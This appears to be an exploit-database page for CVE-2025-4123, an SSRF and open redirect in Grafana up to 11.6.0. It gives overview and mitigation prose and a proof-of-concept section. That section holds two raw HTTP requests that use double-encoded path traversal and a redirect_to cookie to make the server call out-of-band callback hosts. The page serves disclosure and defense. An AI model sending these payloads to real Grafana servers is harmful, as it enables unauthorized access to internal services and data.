Skip to main content
Home/Exploits/WebApps/Grafana 11.6.0 – SSRF
EXPLOIT

Grafana 11.6.0 – SSRF

CVE ID: CVE-2025-4123
Vulnerability Type: Unknown
Author: Beatriz Fresno Naumova
Categories: WebApps

Overview

The recently discovered SSRF vulnerability in Grafana version 11.6.0, identified as CVE-2025-4123, poses a significant risk to users of this popular open-source analytics and monitoring platform. This vulnerability allows attackers to send crafted requests to internal systems, potentially exposing sensitive data or enabling unauthorized actions within the network.

Technical Details

At its core, CVE-2025-4123 exploits the Server-Side Request Forgery (SSRF) mechanism within Grafana. An attacker can manipulate a Grafana instance to make HTTP requests to internal resources by crafting specific queries. This is particularly dangerous as it can allow access to services that are not exposed to the public internet, such as cloud metadata APIs or internal databases.

The vulnerability arises from insufficient validation of user-supplied input, which lets attackers bypass security controls. For example, an attacker could send a request to http://localhost:3000/secret-data, potentially retrieving sensitive information stored in a backend database or configuration files.

Impact

The implications of CVE-2025-4123 are severe, as successful exploitation can lead to data leakage, unauthorized access to internal services, and even full system compromise. Organizations that rely on Grafana for monitoring and analytics may find their sensitive data exposed, leading to regulatory penalties and reputational damage.

Mitigation

To protect against CVE-2025-4123, it is crucial for organizations to upgrade to the latest version of Grafana, where this vulnerability has been patched. Security professionals should prioritize applying this update across all instances in use.

Additionally, implementing network segmentation and strict access controls can help limit the potential impact of SSRF vulnerabilities. Regular security audits and penetration testing should also be conducted to identify and remediate any vulnerabilities in the infrastructure. Finally, educating development teams about secure coding practices will further reduce the risk of similar vulnerabilities emerging in the future.

Proof of Concept (PoC)

request.http 
# Exploit Title: Grafana  11.6.0 - SSRF 
# FOFA: app="Grafana"
# Date: 2-11-2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 11.2.0 - 11.6.0
# CVE: CVE-2025-4123

Description:
An SSRF (Server-Side Request Forgery) vulnerability exists in Grafana's `render/public` (and related public rendering) endpoints owing to a combination of client-side path traversal encoding and an open redirect. Under certain configurations — especially when anonymous access or vulnerable plugins (e.g., Image Renderer) are enabled — an attacker can cause the server to perform requests to attacker-controlled hosts or induce redirections that lead to SSRF and subsequent information disclosure.

POC:
GET /render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f.. HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept-Encoding: gzip

GET /public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F.. HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19
Connection: close
Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f..
Accept-Encoding: gzip

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...